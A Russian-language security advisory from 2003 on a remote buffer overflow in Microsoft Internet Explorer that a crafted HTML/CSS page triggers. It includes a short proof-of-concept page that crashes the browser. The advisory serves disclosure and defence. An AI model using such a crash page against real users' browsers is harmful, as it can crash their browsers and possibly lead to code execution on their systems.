Удаленное переполнение буфера в Microsoft Internet Explorer

Дата публикации:
04.10.2003
Всего просмотров:
914
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Microsoft Internet Explorer

Описание: Уязвимость обнаружена в Microsoft Internet Explorer. Удаленный атакующий может аварийно завершить работу браузера и, возможно, выполнить произвольный код на уязвимой системе.

Удаленный пользователь может сконструировать специально обработанную страницу, содержащую комбинацию HTML и CSS, чтобы аварийно завершить работу Internet Explorer. Возможно уязвимость может использоваться для выполнения произвольного кода.

Пример/Эксплоит:

<html>
<body>
<style type="text/css">
#three {
position: absolute;
}
#one #two {
position: absolute;
}
</style>
<div id="one">
In 'one'
<span id="two">
In 'two'
</div>
<div id="three">
In 'three'
</div>
</body>

URL производителя: http://www.microsoft.com

Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. Не заходите на недоверенные Web сайты. Используйте альтернативное программное обеспечение.

или введите имя

CAPTCHA